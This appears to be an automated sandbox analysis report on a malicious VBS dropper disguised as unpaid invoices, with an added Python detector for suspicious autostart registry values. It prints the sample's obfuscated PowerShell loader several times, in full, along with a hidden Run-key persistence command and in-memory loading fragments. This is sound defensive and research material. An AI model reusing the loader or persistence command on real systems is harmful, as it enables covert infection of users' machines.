                Source: C:\Windows\System32\wscript.exe | COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
                Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Servicetilbuds Fangerne Sidsernes Cormidium Brnesangen Pouty #>;$Tredjeverdenslandets='Bilberries43';<#Efterordenes fjedervgt Soubrettens leftism Radiography #>;$Saltvandsfisk=$selvvirkendes+$host.UI; function pepperiness($Klassesttet){If ($Saltvandsfisk) {$Envisaging++;}$possesses=$Unlimned+$Klassesttet.'Length'-$Envisaging; for( $Multiciliated=4;$Multiciliated -lt $possesses;$Multiciliated+=5){$Aithochroi56=$Multiciliated;$Politiskoler+=$Klassesttet[$Multiciliated];$Opbyggeligste='Weltanschauung';}$Politiskoler;}function Isopor($jomfrunalske){ & ($Hovedkarakterer) ($jomfrunalske);}$Folkeskoleomraadet=pepperiness 'IsolMAnlgoEffez noriEssolGanglin,ta Lig/ Bl, ';$Folkeskoleomraadet+=pepperiness 'Refr5ra e.Spot0omda Mulc(IndtW DisiBespn Dd dModao A,cwKultsFedt igN avT Ten fi.1slay0Thom.Unde0Stav;Ahop Lo iW teriKravnKurs6Sis.4Engr;Tank HjrxOpti6Rhyp4Incr; ete TrasrGeo v ,es: yr1Dile3 Tai1 Bio. 
alg0 Pos)Perp ForsG OuteMaancZan.kCathoBart/ Che2Vold0Pauc1Sluk0 Chi0 S a1 ea0w.re1Prog GynoFBelviLokar ndeeLegefHe soNonrxNett/halv1,eta3Ku m1Data.Upbu0 Gui ';$Efterords=pepperiness 'DiktuPhotsOverE orlrK.od-Job aForbg KofeSy,bnRisitProg ';$Ordreafgivelser=pepperiness 'UnmehTeletGrost enpImplsUdtr:Sols/Mora/Kanopov rlP rsi AlleSenslForstBlyadB,nz.Hy.etbil,oR afpBakk/BeasT isclUdtnlChile B esIdio1Barb8glut7Time.F,agdMadke S lpDokul In oSendySubc ';$haole=pepperiness 'tetr>Wels ';$Hovedkarakterer=pepperiness 'CockIdumhe SinXAnse ';$Kontrahering='Tekstlig';$Jackhammer='\Clothesman.Vin';Isopor (pepperiness 'Thig$ BraGStemlCordoMarvBPostaEthiLCibo:OverE psVTe.meJagtLSatiE,easeDe enArmhs Asp=Unit$Brute OttnS utVexpr:T,veaEncrp HaaP ondalfaAPe sT HofAsymp+Bobs$ Kvsj En AMatacMisakNoteH,orlaTomeMPeptMPrese oldRBus ');Isopor (pepperiness 'Hard$Und gSociLTveto WoobPar anotal ead:SkamfHestoUdsiRDraiMDissA A tlpo,yIDis SKrameart S Sen=Chil$disiOWorrr eaDDemoR MaeEFigeaF gef Drag limIRe.rvForaECuralEd csReolEKobbr Cla.StatS,lebp LisL LanIBoggtS ag(H,po$SemihMa,iASnito.onpLOctreacet)Told ');Isopor (pepperiness ' Und[SwifnstabETsumT.agt.ForuSGeneERadircemev StriTilnC .ekEOctopRed.oKleiI Sa NGav.T bscM,kraAUnclNBnnea,nnigPh,ce MolR nrt] B,l:Succ:MusksProgev.rdcSt.aUFl.tRd ndI FlytJaywYjvnfpParaRWineOInfithummoDolocRom oSignLMidt Cecr=Foru Excr[Kaian.emie.lgttU ru. RhasH,rpeve,ecEndiuAsteRPro iLallT egeYTuvaPT anroutgoFarmT TabODyrlcStauOBobbL StuTVoicy ussPU saeAtio]Oec,:grat: esstMidnlchteS Non1Ca.o2Ddsr ');$Ordreafgivelser=$Formalises[0];$Gammel=(pepperiness 'S it$predgEstalLe iOUninbK alaEnteL Sax:M drL nivIIntent kuIParmESvrtn CyluBo.dm ComMCr dePlicrSynteSkylr disiB,rrnP rsGJeopeKravrskld= PosN taoERepewDugp- Geno AdebMilij ti EGalvcImprtPi.k autoS marYFor.S,aratStudeUnflMT,ta.SkatNPepeE IgntHjem.DephwUdtrEHrigBDevaCOrdsl ForISalte ilinSy,cthust ');Isopor ($Gammel);Isopor (pepperiness 'Kvid$intelIndbi NebnMilii Tote HypnSnuruReprmVit
                Source: C:\Windows\SysWOW64\msiexec.exe | Process Stats: CPU usage > 49%
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD9A17BF32
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD9A17B182
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD9A24A7EA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_04A4EDE0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_04A4FAB8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_04A4EA98
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_077FCEF0
                Source: IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs | Initial sample: Strings found which are bigger than 50
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)"
                Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 6215
                Source: unknown | Process created: Commandline size = 6215
                Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 6215
                Source: amsi32_8168.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 7876, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 8168, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engine | Classification label: mal100.troj.expl.evad.winVBS@16/8@4/2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Clothesman.Vin
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2136:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7884:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8176:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7816:120:WilError_03
                Source: C:\Windows\SysWOW64\msiexec.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-TXCR8B
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_55lrmmve.za3.ps1
                Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs"
                Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process Where Name = 'Ekstremisters.exe'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7876
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=8168
                Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs"
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677e
                Source: C:\Windows\System32\PING.EXE | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Servicetilbuds Fangerne Sidsernes Cormidium Brnesangen Pouty #>;$Tredjeverdenslandets='Bilberries43';<#Efterordenes fjedervgt Soubrettens leftism Radiography #>;$Saltvandsfisk=$selvvirkendes+$host.UI; function pepperiness($Klassesttet){If ($Saltvandsfisk) {$Envisaging++;}$possesses=$Unlimned+$Klassesttet.'Length'-$Envisaging; for( $Multiciliated=4;$Multiciliated -lt $possesses;$Multiciliated+=5){$Aithochroi56=$Multiciliated;$Politiskoler+=$Klassesttet[$Multiciliated];$Opbyggeligste='Weltanschauung';}$Politiskoler;}function Isopor($jomfrunalske){ & ($Hovedkarakterer) ($jomfrunalske);}$Folkeskoleomraadet=pepperiness 'IsolMAnlgoEffez noriEssolGanglin,ta Lig/ Bl, ';$Folkeskoleomraadet+=pepperiness 'Refr5ra e.Spot0omda Mulc(IndtW DisiBespn Dd dModao A,cwKultsFedt igN avT Ten fi.1slay0Thom.Unde0Stav;Ahop Lo iW teriKravnKurs6Sis.4Engr;Tank HjrxOpti6Rhyp4Incr; ete TrasrGeo v ,es: yr1Dile3 Tai1 Bio. 
alg0 Pos)Perp ForsG OuteMaancZan.kCathoBart/ Che2Vold0Pauc1Sluk0 Chi0 S a1 ea0w.re1Prog GynoFBelviLokar ndeeLegefHe soNonrxNett/halv1,eta3Ku m1Data.Upbu0 Gui ';$Efterords=pepperiness 'DiktuPhotsOverE orlrK.od-Job aForbg KofeSy,bnRisitProg ';$Ordreafgivelser=pepperiness 'UnmehTeletGrost enpImplsUdtr:Sols/Mora/Kanopov rlP rsi AlleSenslForstBlyadB,nz.Hy.etbil,oR afpBakk/BeasT isclUdtnlChile B esIdio1Barb8glut7Time.F,agdMadke S lpDokul In oSendySubc ';$haole=pepperiness 'tetr>Wels ';$Hovedkarakterer=pepperiness 'CockIdumhe SinXAnse ';$Kontrahering='Tekstlig';$Jackhammer='\Clothesman.Vin';Isopor (pepperiness 'Thig$ BraGStemlCordoMarvBPostaEthiLCibo:OverE psVTe.meJagtLSatiE,easeDe enArmhs Asp=Unit$Brute OttnS utVexpr:T,veaEncrp HaaP ondalfaAPe sT HofAsymp+Bobs$ Kvsj En AMatacMisakNoteH,orlaTomeMPeptMPrese oldRBus ');Isopor (pepperiness 'Hard$Und gSociLTveto WoobPar anotal ead:SkamfHestoUdsiRDraiMDissA A tlpo,yIDis SKrameart S Sen=Chil$disiOWorrr eaDDemoR MaeEFigeaF gef Drag limIRe.rvForaECuralEd csReolEKobbr Cla.StatS,lebp LisL LanIBoggtS ag(H,po$SemihMa,iASnito.onpLOctreacet)Told ');Isopor (pepperiness ' Und[SwifnstabETsumT.agt.ForuSGeneERadircemev StriTilnC .ekEOctopRed.oKleiI Sa NGav.T bscM,kraAUnclNBnnea,nnigPh,ce MolR nrt] B,l:Succ:MusksProgev.rdcSt.aUFl.tRd ndI FlytJaywYjvnfpParaRWineOInfithummoDolocRom oSignLMidt Cecr=Foru Excr[Kaian.emie.lgttU ru. RhasH,rpeve,ecEndiuAsteRPro iLallT egeYTuvaPT anroutgoFarmT TabODyrlcStauOBobbL StuTVoicy ussPU saeAtio]Oec,:grat: esstMidnlchteS Non1Ca.o2Ddsr ');$Ordreafgivelser=$Formalises[0];$Gammel=(pepperiness 'S it$predgEstalLe iOUninbK alaEnteL Sax:M drL nivIIntent kuIParmESvrtn CyluBo.dm ComMCr dePlicrSynteSkylr disiB,rrnP rsGJeopeKravrskld= PosN taoERepewDugp- Geno AdebMilij ti EGalvcImprtPi.k autoS marYFor.S,aratStudeUnflMT,ta.SkatNPepeE IgntHjem.DephwUdtrEHrigBDevaCOrdsl ForISalte ilinSy,cthust ');Isopor ($Gammel);Isopor (pepperiness 'Kvid$intelIndbi NebnMilii Tote HypnSnuruReprmVit
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
                Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)"
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)"
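The Run value that reg.exe writes at the end of the chain above deserves a closer look. It is created by msiexec.exe, which the 32-bit PowerShell started with an empty command line and which is evidently running injected code, since a stock msiexec does not write autostart keys. The value type is REG_EXPAND_SZ, so the launcher is whatever %Hexokinase% expands to at logon (this section of the report does not show where that variable is defined); the launcher runs with -windowstyle 1, the numeric form of Hidden; and the script it executes is never written to disk: it is read from the value carlcorey under HKCU\Software\Skulptureredes and handed straight back to the same launcher. The Python below is an added example written for this page, not code from the Joe Sandbox report or from the sample. It scores exported Run values for those four traits. The two benign-looking entries in the sample are constructed, and the list of Windows-defined environment variables that a normal entry may legitimately start with is an assumption.

```python
import re

# Constructed sample of HKCU\Software\Microsoft\Windows\CurrentVersion\Run values as a
# collector might export them: (value name, registry type, data). The first entry is the
# one the report shows reg.exe writing; the other two are made-up benign-looking entries.
SAMPLE_RUN_VALUES = [
    ("Sandsynliggrelsens", "REG_EXPAND_SZ",
     r"%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)"),
    ("SyncClient", "REG_SZ", r'"C:\Users\user\AppData\Local\Vendor\sync.exe" /background'),
    ("TrayHelper", "REG_EXPAND_SZ", r"%SystemRoot%\system32\helper.exe /tray"),
]

# Variables Windows itself defines (assumed list). A launcher that starts with any other
# %NAME% resolves to whatever was planted in the user's environment.
STANDARD_ENV = {
    "SYSTEMROOT", "WINDIR", "SYSTEMDRIVE", "COMSPEC", "PROGRAMFILES", "PROGRAMFILES(X86)",
    "PROGRAMDATA", "APPDATA", "LOCALAPPDATA", "USERPROFILE",
}


def nonstandard_env_launcher(data: str) -> bool:
    """The executable is an environment-variable reference Windows does not define."""
    m = re.match(r"\s*%([^%]+)%", data)
    return m is not None and m.group(1).upper() not in STANDARD_ENV


def hidden_window(data: str) -> bool:
    """powershell -WindowStyle takes the enum name or its number; 1 is Hidden."""
    return re.search(r"-w[a-z]*\s+(?:1|hidden)\b", data, re.IGNORECASE) is not None


def registry_stored_payload(data: str) -> bool:
    """Get-ItemProperty (alias gp) against HKCU:/HKLM: means the script body lives in the registry."""
    return re.search(r"\b(?:gp|Get-ItemProperty)\b[^;]*\bHK(?:CU|LM):", data, re.IGNORECASE) is not None


def relaunches_with_variable(data: str) -> bool:
    """'%X% ($var)': the launcher is invoked again with a variable's contents as the script."""
    return re.search(r"%[^%]+%\s*\(\s*\$\w+\s*\)", data) is not None


CHECKS = [
    ("nonstandard_env_launcher", nonstandard_env_launcher),
    ("hidden_window", hidden_window),
    ("registry_stored_payload", registry_stored_payload),
    ("relaunches_with_variable", relaunches_with_variable),
]


def triage_run_values(values):
    """Map each Run value name to the list of indicator names its data triggers."""
    return {name: [tag for tag, check in CHECKS if check(data)] for name, _type, data in values}


if __name__ == "__main__":
    for name, tags in triage_run_values(SAMPLE_RUN_VALUES).items():
        print(f"{name}: {', '.join(tags) or 'no indicators'}")
```

Any one of the four checks on its own is weak (plenty of legitimate software starts hidden), but a single value that trips all four is a fileless autostart and should be pulled together with the referenced registry key and the environment variable it names.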
                Source: C:\Windows\System32\wscript.exe | Sections loaded (in order): version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, gpapi.dll, wbemcomn.dll, mpr.dll, scrrun.dll, windows.storage.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
                Source: C:\Windows\System32\PING.EXE | Sections loaded (in order): iphlpapi.dll, mswsock.dll, dnsapi.dll, rasadhlp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded (in order): atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, wbemcomn.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll, sxs.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Sections loaded (in order): atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll, wbemcomn.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, iphlpapi.dll, mswsock.dll, dnsapi.dll, winrnr.dll, fwpuclnt.dll, rasadhlp.dll, apphelp.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Sections loaded (in order): apphelp.dll, aclayers.dll, mpr.dll, sfc.dll, sfc_os.dll, windows.storage.dll, wldp.dll, kernel.appcore.dll, uxtheme.dll, propsys.dll, profapi.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, wininet.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll, winmm.dll, rstrtmgr.dll
                Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                Source: Binary string: ystem.Core.pdbz | source: powershell.exe, 00000005.00000002.1988660063.000000000769A000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run("powershell " <#Servicetilbuds Fangerne Sidsernes Cormidium Brnesangen Pouty #>;$Tredjeverdenslandets='Bilberries4", "0")
                Source: Yara match | File source: 00000005.00000002.1994713793.000000000927D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.1994393544.00000000089E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.1982397865.0000000005F76000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.1774074401.000001CBABCF5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($charlady)$gLOBal:tuCKToO = [sYstEm.TexT.EncODiNG]::aSCIi.getStRiNg($jOBBErENS)$GlObal:sEMICOnVENTIOnAlItY=$TucKToo.sUbString($BoRtvend,$blOdBANkeN)<#uddeleren Teioid Andelsbevgelse M
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Revolverbnke $Tankeoverfringens26 $Briskened), (unsanctioning @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Phallics = [AppDomain]::CurrentDomain.GetAsse
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Tidtagende)), $Kursiver).DefineDynamicModule($Disconformably158, $false).DefineType($Studentereksaminen217, $tremorlessly, [System.Mul
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($charlady)$gLOBal:tuCKToO = [sYstEm.TexT.EncODiNG]::aSCIi.getStRiNg($jOBBErENS)$GlObal:sEMICOnVENTIOnAlItY=$TucKToo.sUbString($BoRtvend,$blOdBANkeN)<#uddeleren Teioid Andelsbevgelse M
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Servicetilbuds Fangerne Sidsernes Cormidium Brnesangen Pouty #>;$Tredjeverdenslandets='Bilberries43';<#Efterordenes fjedervgt Soubrettens leftism Radiography #>;$Saltvandsfisk=$selvvirkendes+$host.UI; function pepperiness($Klassesttet){If ($Saltvandsfisk) {$Envisaging++;}$possesses=$Unlimned+$Klassesttet.'Length'-$Envisaging; for( $Multiciliated=4;$Multiciliated -lt $possesses;$Multiciliated+=5){$Aithochroi56=$Multiciliated;$Politiskoler+=$Klassesttet[$Multiciliated];$Opbyggeligste='Weltanschauung';}$Politiskoler;}function Isopor($jomfrunalske){ & ($Hovedkarakterer) ($jomfrunalske);}$Folkeskoleomraadet=pepperiness 'IsolMAnlgoEffez noriEssolGanglin,ta Lig/ Bl, ';$Folkeskoleomraadet+=pepperiness 'Refr5ra e.Spot0omda Mulc(IndtW DisiBespn Dd dModao A,cwKultsFedt igN avT Ten fi.1slay0Thom.Unde0Stav;Ahop Lo iW teriKravnKurs6Sis.4Engr;Tank HjrxOpti6Rhyp4Incr; ete TrasrGeo v ,es: yr1Dile3 Tai1 Bio. 
alg0 Pos)Perp ForsG OuteMaancZan.kCathoBart/ Che2Vold0Pauc1Sluk0 Chi0 S a1 ea0w.re1Prog GynoFBelviLokar ndeeLegefHe soNonrxNett/halv1,eta3Ku m1Data.Upbu0 Gui ';$Efterords=pepperiness 'DiktuPhotsOverE orlrK.od-Job aForbg KofeSy,bnRisitProg ';$Ordreafgivelser=pepperiness 'UnmehTeletGrost enpImplsUdtr:Sols/Mora/Kanopov rlP rsi AlleSenslForstBlyadB,nz.Hy.etbil,oR afpBakk/BeasT isclUdtnlChile B esIdio1Barb8glut7Time.F,agdMadke S lpDokul In oSendySubc ';$haole=pepperiness 'tetr>Wels ';$Hovedkarakterer=pepperiness 'CockIdumhe SinXAnse ';$Kontrahering='Tekstlig';$Jackhammer='\Clothesman.Vin';Isopor (pepperiness 'Thig$ BraGStemlCordoMarvBPostaEthiLCibo:OverE psVTe.meJagtLSatiE,easeDe enArmhs Asp=Unit$Brute OttnS utVexpr:T,veaEncrp HaaP ondalfaAPe sT HofAsymp+Bobs$ Kvsj En AMatacMisakNoteH,orlaTomeMPeptMPrese oldRBus ');Isopor (pepperiness 'Hard$Und gSociLTveto WoobPar anotal ead:SkamfHestoUdsiRDraiMDissA A tlpo,yIDis SKrameart S Sen=Chil$disiOWorrr eaDDemoR MaeEFigeaF gef Drag limIRe.rvForaECuralEd csReolEKobbr Cla.StatS,lebp LisL LanIBoggtS ag(H,po$SemihMa,iASnito.onpLOctreacet)Told ');Isopor (pepperiness ' Und[SwifnstabETsumT.agt.ForuSGeneERadircemev StriTilnC .ekEOctopRed.oKleiI Sa NGav.T bscM,kraAUnclNBnnea,nnigPh,ce MolR nrt] B,l:Succ:MusksProgev.rdcSt.aUFl.tRd ndI FlytJaywYjvnfpParaRWineOInfithummoDolocRom oSignLMidt Cecr=Foru Excr[Kaian.emie.lgttU ru. RhasH,rpeve,ecEndiuAsteRPro iLallT egeYTuvaPT anroutgoFarmT TabODyrlcStauOBobbL StuTVoicy ussPU saeAtio]Oec,:grat: esstMidnlchteS Non1Ca.o2Ddsr ');$Ordreafgivelser=$Formalises[0];$Gammel=(pepperiness 'S it$predgEstalLe iOUninbK alaEnteL Sax:M drL nivIIntent kuIParmESvrtn CyluBo.dm ComMCr dePlicrSynteSkylr disiB,rrnP rsGJeopeKravrskld= PosN taoERepewDugp- Geno AdebMilij ti EGalvcImprtPi.k autoS marYFor.S,aratStudeUnflMT,ta.SkatNPepeE IgntHjem.DephwUdtrEHrigBDevaCOrdsl ForISalte ilinSy,cthust ');Isopor ($Gammel);Isopor (pepperiness 'Kvid$intelIndbi NebnMilii Tote HypnSnuruReprmVit
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Servicetilbuds Fangerne Sidsernes Cormidium Brnesangen Pouty #>;$Tredjeverdenslandets='Bilberries43';<#Efterordenes fjedervgt Soubrettens leftism Radiography #>;$Saltvandsfisk=$selvvirkendes+$host.UI; function pepperiness($Klassesttet){If ($Saltvandsfisk) {$Envisaging++;}$possesses=$Unlimned+$Klassesttet.'Length'-$Envisaging; for( $Multiciliated=4;$Multiciliated -lt $possesses;$Multiciliated+=5){$Aithochroi56=$Multiciliated;$Politiskoler+=$Klassesttet[$Multiciliated];$Opbyggeligste='Weltanschauung';}$Politiskoler;}function Isopor($jomfrunalske){ & ($Hovedkarakterer) ($jomfrunalske);}$Folkeskoleomraadet=pepperiness 'IsolMAnlgoEffez noriEssolGanglin,ta Lig/ Bl, ';$Folkeskoleomraadet+=pepperiness 'Refr5ra e.Spot0omda Mulc(IndtW DisiBespn Dd dModao A,cwKultsFedt igN avT Ten fi.1slay0Thom.Unde0Stav;Ahop Lo iW teriKravnKurs6Sis.4Engr;Tank HjrxOpti6Rhyp4Incr; ete TrasrGeo v ,es: yr1Dile3 Tai1 Bio. 
